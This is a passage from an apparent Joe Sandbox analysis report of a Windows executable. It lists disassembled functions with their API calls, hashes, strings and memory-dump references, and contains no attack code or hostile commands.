7ff6d6eacb75 919->924 920->922 922->896 923->896 926 7ff6d6eacb7a-7ff6d6eacb81 924->926 927 7ff6d6eacb83-7ff6d6eacb87 926->927 928 7ff6d6eacbbd-7ff6d6eacbc8 926->928 929 7ff6d6eacba3 927->929 930 7ff6d6eacb89-7ff6d6eacb90 927->930 928->923 932 7ff6d6eacba9-7ff6d6eacbb9 929->932 930->929 931 7ff6d6eacb92-7ff6d6eacb96 930->931 931->929 933 7ff6d6eacb98-7ff6d6eacba1 931->933 932->926 934 7ff6d6eacbbb 932->934 933->932 934->923
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                                                                                                                            • Instruction ID: 5d4e67a681c4309e92d283f4597d0d5d4c1c33bac67509ec56a87dab5bae1abe
                                                                                                                                                            • Opcode Fuzzy Hash: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                                                                                                                            • Instruction Fuzzy Hash: BFC1E032E0C78791EA619B549440ABD3BB1EB80F80F594233EA4E87395DF7EE865D340
                                                                                                                                                            Function 00007FF6D6E98860 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                            • Opcode ID: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
                                                                                                                                                            • Instruction ID: 92528d0d7bcb08085242739dd735a2bf50937ecbe78476bee2bef18fade48a00
                                                                                                                                                            • Opcode Fuzzy Hash: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
                                                                                                                                                            • Instruction Fuzzy Hash: AB213535E0C74282EB149B59F44053EA3A1EF85BA8F144637EAAD83AE4DF7DE465C700
                                                                                                                                                            Function 00007FF6D6E98B80 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetCurrentProcess.KERNEL32 ref: 00007FF6D6E98880
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: OpenProcessToken.ADVAPI32 ref: 00007FF6D6E98891
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetTokenInformation.KERNELBASE ref: 00007FF6D6E988B6
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetLastError.KERNEL32 ref: 00007FF6D6E988C0
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: GetTokenInformation.KERNELBASE ref: 00007FF6D6E98900
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6D6E9891C
                                                                                                                                                              • Part of subcall function 00007FF6D6E98860: CloseHandle.KERNEL32 ref: 00007FF6D6E98934
                                                                                                                                                            • LocalFree.KERNEL32(00000000,00007FF6D6E93B4E), ref: 00007FF6D6E98C0C
                                                                                                                                                            • LocalFree.KERNEL32 ref: 00007FF6D6E98C15
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                            • API String ID: 6828938-1817031585
                                                                                                                                                            • Opcode ID: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                                                                                                                            • Instruction ID: e2efa90a4f81d90309ccd1215f6b614e6f5e5ade45604c80629f9f332b93f84b
                                                                                                                                                            • Opcode Fuzzy Hash: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                                                                                                                            • Instruction Fuzzy Hash: BD216A22E1C74681FA10AB20E8056FE6364EF88784F840933E94ED37A6DF3EE565C741
                                                                                                                                                            Function 00007FF6D6E93F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6D6E939CA), ref: 00007FF6D6E93F34
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                            • Opcode ID: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                                                                                                                            • Instruction ID: d527db7827976f14371b1f7155f401aea9f0d232c3f11ada64af47b4eafae0e3
                                                                                                                                                            • Opcode Fuzzy Hash: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                                                                                                                            • Instruction Fuzzy Hash: E6114C21F1D68381FB619725E8113FE6265AF487CCF900433E84EC669AEE2EE6658710
                                                                                                                                                            Function 00007FF6D6EADD10 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6D6EADCFB), ref: 00007FF6D6EADE2C
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6D6EADCFB), ref: 00007FF6D6EADEB7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            • Opcode ID: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                                                                                            • Instruction ID: 8d2cfd2b41fd03baeaef28c4fb1db125180a3d201b61b8140069449646260a8c
                                                                                                                                                            • Opcode Fuzzy Hash: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                                                                                            • Instruction Fuzzy Hash: 8791D172F1C65285F7608F658480ABD6BB5BB54B88F14413BDE0ED7A84DF3AE46AC700
                                                                                                                                                            Function 00007FF6D6EB04DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                            • Opcode ID: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                                                                                            • Instruction ID: b279be2870b0c0cd98f3e55a1803b9098a68aa68fa8a1cd5bc3d018dcee3e710
                                                                                                                                                            • Opcode Fuzzy Hash: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                                                                                            • Instruction Fuzzy Hash: 8E510772F1D7118AFB24DF2899556BC3761AB50358F500136ED1E92EE9DF39B4A28700
                                                                                                                                                            Function 00007FF6D6EA5EF0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                            • Opcode ID: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                                                                                                                            • Instruction ID: 1742d14591b77fa9288fadeaa1c55c686348bf96318c16b62dd0265429559735
                                                                                                                                                            • Opcode Fuzzy Hash: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                                                                                                                            • Instruction Fuzzy Hash: 1E41BE62E1C78283E7508B20950077D6760FB957A4F10933AEA9C83AD5EF7DA5F48740
                                                                                                                                                            Function 00007FF6D6E9C3CC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                            • Opcode ID: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                                                                                                                            • Instruction ID: ad4421c395a8a058f480a95d44cadf6dae757e6382fc1aa1f5b1799d215d3dca
                                                                                                                                                            • Opcode Fuzzy Hash: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                                                                                                                            • Instruction Fuzzy Hash: 56314A21E0C24341FB24BB69A4553BD2291AF81B88F841037DA0ECB2D3DF2FB526E650
                                                                                                                                                            Function 00007FF6D6EAA7E4 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                            • Opcode ID: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                                                                                                                            • Instruction ID: a95a57d3f746f12fb372d38f9db7876ac4f46e46868a9ceaa1b39e0509ec21f7
                                                                                                                                                            • Opcode Fuzzy Hash: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                                                                                                                            • Instruction Fuzzy Hash: 61D09210F0C78282FA182BBA589947D22215F48F41F04643AC80F86393CE3EA86ED251
                                                                                                                                                            Function 00007FF6D6E98D80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateDirectoryMessage
                                                                                                                                                            • String ID: Security descriptor is not initialized!
                                                                                                                                                            • API String ID: 73271072-986317556
                                                                                                                                                            • Opcode ID: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                                                                                                                            • Instruction ID: 7e419087cb246790d657fddcb0800fdd8d08a6480b211dd82dc15d7f1b95fea9
                                                                                                                                                            • Opcode Fuzzy Hash: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                                                                                                                            • Instruction Fuzzy Hash: 69E09271E1C74686EA509B24E80426D23A0FBA1754F940336E54CC63E4DF3DD1298F00
                                                                                                                                                            Function 00007FF6D6EA0A6C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
                                                                                                                                                            • Instruction ID: 5df152eeed13d6cd9be8759d554d0609bbd276f78a387700782833ccd2eba3ff
                                                                                                                                                            • Opcode Fuzzy Hash: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
                                                                                                                                                            • Instruction Fuzzy Hash: AC51F871F0D64146FA689E259400F7E66A1BF44BACF188736DE6D877C9CF3EE4208611
                                                                                                                                                            Function 00007FF6D6EAB910 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6D6EAB78D,?,?,00000000,00007FF6D6EAB842), ref: 00007FF6D6EAB97E
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6D6EAB78D,?,?,00000000,00007FF6D6EAB842), ref: 00007FF6D6EAB988
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1687624791-0
                                                                                                                                                            • Opcode ID: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                                                                                            • Instruction ID: 2af29498a4700036723d61b3cc18798b875780d614cb05d79f93530ba5eef433
                                                                                                                                                            • Opcode Fuzzy Hash: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                                                                                            • Instruction Fuzzy Hash: 4721D851F0C68241FE945765959067D12E16F94BA4F04433BDA6EC73C6CF6EE4748300
                                                                                                                                                            Function 00007FF6D6EACEE4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                            • Opcode ID: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                                                                                            • Instruction ID: 03a519b75075920e4827f4ff4f5a5125d7a4f79e3f498ba37a7a681d938a61d8
                                                                                                                                                            • Opcode Fuzzy Hash: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                                                                                            • Instruction Fuzzy Hash: 43119165B1CB8181DA208B29A40416D73A1BB85FF4F684336EE7D8B7E9CF7DD0648740
                                                                                                                                                            Function 00007FF6D6EA88E0 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6EA875D), ref: 00007FF6D6EA8903
                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6EA875D), ref: 00007FF6D6EA8919
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                            • Opcode ID: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                                                                                                                            • Instruction ID: ac757873a88d15e5b51e7d94ea35a7c4b7e47e007a5ec2a68af27be53572b689
